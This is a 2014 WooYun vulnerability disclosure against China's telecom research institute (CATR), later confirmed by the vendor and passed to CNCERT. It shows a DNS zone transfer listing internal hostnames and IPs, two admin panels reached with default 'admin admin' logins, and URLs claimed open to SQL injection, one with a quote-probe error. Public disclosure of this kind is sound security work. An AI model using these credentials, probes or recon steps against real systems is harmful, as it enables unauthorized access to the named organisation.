当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2014-057163
漏洞标题:
工业和信息化部电信研究院漏洞打包
相关厂商:
工业和信息化部电信研究院
漏洞作者:
乐乐、
提交时间:
2014-04-16 15:36
修复时间:
2014-05-31 15:36
公开时间:
2014-05-31 15:36
漏洞类型:
系统/服务运维配置不当
危害等级:
自评Rank:
20
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2014-04-16: 细节已通知厂商并且等待厂商处理中
2014-04-21: 厂商已经确认,细节仅向厂商公开
2014-05-01: 细节向核心白帽子及相关领域专家公开
2014-05-11: 细节向普通白帽子公开
2014-05-21: 细节向实习白帽子公开
2014-05-31: 细节向公众公开

简要描述:

一个DNS域传送漏洞引起的....

详细说明:

首先是发现工信部电信研究院的DNS域传送~

C:\Users\LeLe's>nslookup
默认服务器:  X
Address:  X
> set type=ns
>
> catr.cn
服务器:  X
Address:  X
非权威应答:
catr.cn nameserver = dns.cci.cn.net
catr.cn nameserver = dns.catr.com.cn
dns.cci.cn.net  internet address = 219.239.97.125
dns.catr.com.cn internet address = 114.242.138.121
> server dns.catr.com.cn
默认服务器:  dns.catr.com.cn
Address:  114.242.138.121
> ls catr.cn
[dns.catr.com.cn]
 catr.cn.                       NS     server = dns.cci.cn.net
 catr.cn.                       NS     server = dns.catr.com.cn
 catr.cn.                       A      219.239.97.40
 #koa                           A      219.239.97.46
 #mail                          A      219.239.97.60
 acsi                           A      219.239.97.52
 apectel49                      A      219.239.97.126
 apectelmra                     A      219.239.97.52
 bbs                             A      219.239.97.22
 blog                      A      219.239.97.113
 broadband-m2m                 A      219.239.97.52
 catrma                            A      219.239.97.64
 catrmb                     A      219.239.97.65
 ccicc                       A      219.239.97.52
 certificate                     A      219.239.97.37
 cff                               A      219.239.97.52
 chinacc                        A      219.239.97.52
 chinatcc                       A      219.239.97.52
 chinatqac                         A      219.239.97.52
 cim                            A      219.239.97.52
 club                             A      219.239.97.113
 clubnew                          A      219.239.97.22
 elink.crp                      A      219.239.97.24
 m.crp                          A      219.239.97.24
 ctu                                A      219.239.97.52
 data                           A      219.239.97.52
 db                             A      219.239.97.85
 down                            A      219.239.97.22
 ecte                             A      219.239.97.52
 english                        A      219.239.97.52
 forum                            A      219.239.97.52
 ftp                              A      219.239.97.28
 ids                              A      219.239.97.23
 iiinsight                      A      219.239.97.52
 info                               A      219.239.97.52
 ip                              A      59.108.230.35
 ipc                            A      219.239.97.52
 ipe                            A      219.239.97.52
 ituchina                        A      219.239.97.52
 ituchina-bbs                    A      219.239.97.50
 localhost                       A      127.0.0.1
 mail                              A      114.242.138.122
 mail                           A      219.239.97.64
 mailtest                        A      219.239.97.126
 main                             A      219.239.97.52
 manage                             A      219.239.97.52
 market                         A      219.239.97.52
 media                                  A      219.239.97.52
 mobileforum                    A      219.239.97.52
 mstt                              A      219.239.97.80
 news                             A      219.239.97.52
 oldmail                           A      219.239.97.60
 pdri                            A      219.239.97.52
 pm                             A      219.239.97.52
 policy                         A      219.239.97.52
 pr                             A      219.239.97.52
 report                           A      219.239.97.52
 ritt                               A      219.239.97.52
 sa                             A      219.239.97.52
 search                          A      219.239.97.52
 service                        A      219.239.97.52
 shouji                          A      219.239.97.52
 smtp1                             A      114.242.138.123
 sp                              A      219.239.97.52
 spam                           A      219.239.97.34
 standard                        A      219.239.97.52
 stcte                           A      219.239.97.52
 stic                              A      219.239.97.52
 tcg                            A      219.239.97.52
 tdlte                             A      114.242.138.108
 tech                            A      219.239.97.52
 teleinfo                        A      219.239.97.80
 en.teleinfo                    A      219.239.97.80
 tenaa                            A      219.239.97.52
 test                            A      219.239.97.55
 tlc                              A      219.239.97.52
 tm                              A      219.239.97.52
 tntcatr.cn                            A      219.239.97.52
 top10                          A      219.239.97.52
 tousu                          A      219.239.97.53
 ttl                            A      219.239.97.52
 vaschina                        A      219.239.97.52
 vast                            A      219.239.97.52
 view                           A      219.239.97.52
 vpn                             A      219.239.97.46
 webpic                           A      219.239.97.52
 wmail                             A      219.239.97.83
 wt                             A      219.239.97.80
 www                            A      219.239.97.52
 xb                                A      219.239.97.52
 xmldata                         A      219.239.97.63
 zhaopin                         A      219.239.97.52
 zxipr                           A      219.239.97.112
 zxpsipr                         A      219.239.97.112


然后挨个测试....

数据监控系统 http://db.catr.cn/mainpage.aspx admin admin


项目招标信息平台 http://xmldata.catr.cn/indexReal.jsp admin admin


SQL注入 
http://www.chinattl.com/ttlweb/display_A.aspx?id=2328 
http://219.239.97.36/cn/showclass.asp?classid=187
http://219.239.97.36/cn/showclass.asp?classid=39


http://219.239.97.51/chinacc/ShowArticle.asp?ArticleID=1847'
owerEasy 错误 '800a000d'
Type mismatch
/chinacc/ShowArticle.asp,行3

漏洞证明:

12.png


22.png


不一一上图了....
我发现的只是一小部分,很表面的东西....

修复方案:

...........我不会

版权声明:转载请注明来源 乐乐、@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-04-21 09:00

厂商回复:

CNVD确认并复现所述六个漏洞情况,转由CNCERT通过部内联系渠道向工业和信息化部主管部门通报。

最新状态:

暂无